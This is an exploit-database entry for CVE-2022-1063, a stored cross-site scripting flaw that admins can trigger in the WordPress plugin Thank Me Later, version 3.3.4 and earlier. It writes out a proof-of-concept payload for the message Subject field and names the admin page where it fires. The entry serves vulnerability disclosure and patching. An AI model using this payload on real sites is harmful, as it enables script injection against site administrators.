Exploit for Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting CVE-2022-1063

Name: Exploit for Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting CVE-2022-1063
Rating: 5 (54 reviews)

2022-03-28 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:F90C528B-8C3A-4F9A-AA36-099C24ABE082
Add/Edit a message and put the following payload in the Subject field: "><img src onerror=prompt(/XSS/)>

The XSS will be triggered in the Messages list (/wp-admin/admin.php?page=bbpp_thankmelater)